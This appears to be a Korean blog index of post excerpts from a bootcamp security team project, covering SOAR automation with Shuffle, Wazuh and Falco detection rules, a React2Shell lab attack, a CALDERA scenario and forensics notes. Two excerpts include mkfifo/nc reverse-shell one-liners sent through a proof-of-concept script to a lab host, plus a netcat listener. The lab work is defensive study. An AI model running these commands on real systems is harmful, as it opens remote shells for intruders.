전체 글 34

[토스뱅크 부트캠프] 팀프로젝트 Interrupt 7주차

SOAR 정리6. SOAR 기반 위협 및 자동 대응 체계 구축6.1. Shuffle 선정 이유 및 통합 아키텍쳐 설계본 프로젝트에서는 오픈소스 SOAR 플랫폼인 Shuffle을 활용하여 보안 운영의 자동화(SecOps)를 구현했습니다. Shuffle은 워크플로우 기반의 유연한 자동화 시나리오 생성을 지원하며, Wazuh(EDR/SIEM), Falco(Cloud Native Runtime Security) 및 외부 위협 인텔리전스(TI) API와의 확장이 용이하다는 장점이 있습니다.전체 아키텍처는 [수집(Wazuh/Falco) → 정규화 및 컨텍스트 매칭(Shuffle) → 다차원 분석(IP/FIM/SCA) → 상관 분석 및 스코어링 → 자동 대응(Slack/Block)]의 파이프라인으로 구성됩니다.6.2..

카테고리 없음 2026.02.13

[토스뱅크 부트캠프] 팀프로젝트 Interrupt 6주차

전체적인 흐름공격 수집 : Falco / FIM /SCA 로그 들어옴IP 식별IP있으면 해당 IP tkdydIP 없으면 PID/Container ID를 캐시에서 조회하여 매칭하는 IP를 찾아오기점수 합산 : Get Cache로 해당 IP의 기존 점수를 가져와서 새 로그의 위험도를 더한 뒤 Set Cache로 다시 저장임계치 대응 : 합산된 점수가 임계치(예 : 80점)을 넘으면 차단 및 알림로그 수신 및 상태 로드 (Nodes 1~4)webhook: 설정 완료Get Storage (by Agent ID)Key: agent_score_{{ $exec.all_fields.agent.id }}Technical Context: 만약 데이터가 없다면(신규 에이전트), {"total_score": 0, "sca_a..

카테고리 없음 2026.01.28

[토스뱅크 부트캠프] 팀프로젝트 Interrupt 5주차

2차 공격 시나리오 동시 실행을 위한 설정리버스쉘 포트 nc -lvnp 5555로 변경파일 명 구분 : tmp/f 와 tmp/yeji파일 명 구분에 따른 공격 명령어 변경(리버스쉘)[재변경- 둘다 백그라운드 실행]node poc.mjs "rm /tmp/yeji; mkfifo /tmp/yeji; cat /tmp/yeji | sh -i 2>&1 | nc 192.168.10.25 5555 > /tmp/yeji"6.1. Node.js 애플리케이션 로직 오염 (Hidden Backdoor)※그냥 /app이 아니라 /app/app으로 들어가야한다는 점 참고(저번에 발생했던 문제인데 현재 .ts 경로가 /react2shell-poc/app/api안에 route.ts가 있는 상태)[리버스쉘 코드 수정][지속성 유지 ..

카테고리 없음 2026.01.20

[토스뱅크 부트캠프] 팀프로젝트 Interrupt 4주차

공격 시나리오 실행 (step1-2. 초기침투 및 내부정보 수집 ) node poc.mjs http://192.168.10.62:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.10.25 4444 >/tmp/f"하늘색(즉 첫번째 로그가)내가 설정한 룰인 것 확인 가능두번째 (Hacker Tool Execution)은 기본룰임 - nc를 사용했기 때문에 탐지항목로그 1 (커스텀 룰)로그 2 (기본 룰)적용 룰Interrupt_RCE_Reverse_ShellHacker Tool Execution탐지 명분Node 프로세스가 비정상적인 쉘을 생성함시스템에서 위험 도구(nc)가 실행됨공격 단계[STAGE 1] 초기 침투 및 리버스 쉘횡적 이동/정보 ..

카테고리 없음 2026.01.14

[토스뱅크 부트캠프] 팀프로젝트 Interrupt 3주차

안녕하세요 오랜만이죠..?왜냐면 너무 바빠서 프로젝트가 다 끝난 후에야 제대로 정라하기 시작했습니다ㅋㅋㅋㅋㅋㅋㅋㅋ(사실 뭐 핑계인데..실제로 좀 바쁘기도 했어요..) 정~~~말 예전일이라 기억이 가물가물한데 잘 살려서 정리해보겠습니다^^ 먼저 저번주까지 기본적인 인프라 설정에 많이 힘을 쏟았습니다. Zeek와 Arkime을 설치하고 추가로 Elastic APM 까지 설치하였습니다. 음..이 부분은 제가 프로젝트가 다 끝났기 때문에 할 수 있는 말인것 같은데.. 팀을 구성할 때부터 프로젝트 진행 방식에 대해서도 팀원들과 이야기를 많이 해보거나 팀 구성 변동이 불가피한 상황에서는 팀 빌딩 이후에 프로젝트 진행 방식을 이야기 하는게 중요한 것 같습니다. 저희 팀이 조금 아쉬웠던 부분 중 하나인데, 주제는 제..

카테고리 없음 2026.01.07

[토스뱅크 부트캠프] 팀프로젝트 Interrupt 2주차

안녕하세요 TIL 15주차이자 팀프로젝트 2주차 진행중입니다..(사실 TIL이 많이 밀려서 많이 늦게 작성중이긴해요..) 이번주에는 뭔가 조금이라도 뭐를 실행시키고 뭐가 출력되고 뭐가 연결되고 하는거에 초점을 맞췄습니다. 저번주에 제가 제일 답답했던 부분이 아직 아무것도 안보여서 감이 안잡힌다는 점이였기 때문이죠. 그래서 저번주에 찾은 poc코드를 기준으로 kali에서 node.js의 ubuntu환경으로의 공격을 실행해보고 간단한 falco룰 정책을 실행해서 falco 로그들을 wazuh로 보내는 과정부터 구현해보았습니다. 이후 APM, Zeek, Arkime 설치, 그리고 멘토님의 피드백 정리 정도가 2주차에 정리할 내용들이 될 것 같습니다. React2Shell 적용저번주 TIL에 React2Shel..

카테고리 없음 2026.01.06

[토스뱅크 부트캠프] 팀프로젝트 Interrupt 1주차

목차- 주제 소개- 역직렬화란?- React2Shell 이란?- React2Shell 공격 구현- React2Shell의 상관분석- 마치며 안녕하세요 오랜만에 마음먹고 다시 쓰는 TIL (TIL 14주차)이네요. 우선 저희 프로젝트에 대해서 먼저 소개를 하고 현재 어떻게 진행되고 있는지 상세히 설명해보려고 합니다. 사이버보안에 관심 있는 분들, 그리고 혹시라도 내년에 토스뱅크 부트캠프를 하시는 분들께 도움이 되었으면 좋겠습니다..☆ 먼저 저는 Interrupt 조가 되어서 현재 총 4명의 다른 팀원분들과 열심히 프로젝트를 시작하였습니다. (보통 4~6명으로 팀은 구성되었고 총 4개의 주제 중에서 각자 원하고 공부해보고 싶은 주제를 선택해서 가는 방향으로 진행하였습니다.) 주제 소개그래서 저 4가지 주제..

카테고리 없음 2026.01.05

CALDERA 공격 시나리오: Andariel (Linux Web → Windows PC)

1. 🛠️ 트러블슈팅 및 환경 구성 (Troubleshooting)공격 시나리오 수행 전 발생한 문제와 해결 방법입니다.🚨 Issue 1: Payload 다운로드 실패 (HTML 반환) 현상: /file/ghost_rat.sh 요청 시 쉘 스크립트 파일이 아닌 Magma UI의 HTML 코드가 다운로드됨.원인: CALDERA Docker 컨테이너는 /usr/src/app/data/payloads/ 경로만 정적 파일로 서빙함. 사용자가 임의의 경로에 넣은 파일은 인식되지 않음. 해결(Solution): Docker 실행 시 호스트의 payloads 폴더를 컨테이너 내부 데이터 경로로 마운트해야 함.# 올바른 Docker 실행 명령어docker run -it -p 8888:8888 \-v $(pwd)/p..

카테고리 없음 2025.12.17

[Linux] 시스템 로그 분석과 프로세스 포렌식 기초

오늘은 리눅스 시스템 관리와 보안의 핵심인 접속 기록(Logging) 분석과 프로세스 계층(Process Hierarchy) 구조에 대해 깊이 있게 공부했다. 서버를 운영하거나 보안 사고를 분석할 때, "누가, 언제, 어디서 들어왔는가"를 파악하고 "현재 내 쉘이 어떤 권한으로 실행 중인가"를 이해하는 것은 필수적이다.오늘 실습한 주요 명령어와 분석 내용을 정리해 본다.1. 시스템 접속 기록 분석: last리눅스에서 가장 기본이 되는 로그 분석 도구는 last 명령어다. 이 명령어는 /var/log/wtmp 파일을 참조하여 사용자의 로그인, 재부팅, 로그아웃 기록을 보여준다. 위의 last 명령어 실행 결과를 분석해보면 보안 및 시스템 안정성 측면에서 몇 가지 중요한 인사이트를 얻을 수 있다.비정상 종료..

카테고리 없음 2025.12.10

레지스트리-11.28

1. 레지스트리란?→ 윈도우 운영체제의 거대한 저장소 데이터 베이스컴퓨터의 하드웨어, 설치된 소프트웨어, 사용자 설정 등 윈도우가 돌아가는데 필요한 모든 중요한 정보와 옵션 값이 모여 있음윈도우 부팅부터 프로그램 실행까지 이 레지스트리를 참조하여 어떻게 작동해야 할지 결정→ 트리 구조로 모든 정보를 한 곳에 모아 관리레지스트리가 중요한 이유?사용자의 모든 흔적이 남으니까,레지스트리 구조키폴더 같은 개념트리 구조로 되어 있으며 하위 키를 가짐값HKEY_LOCAL이랑 HKEY_USERS에서 데이터를 가져와서여기 이렇게 생김이제 분석할꺼임 🗝️ 1. 지속성 유지 (Persistence) 메커니즘 악성코드가 재부팅 후에도 생존하기 위해 자동 실행을 등록하는 핵심 레지스트리 영역. 1.1 Run / RunO..

카테고리 없음 2025.12.03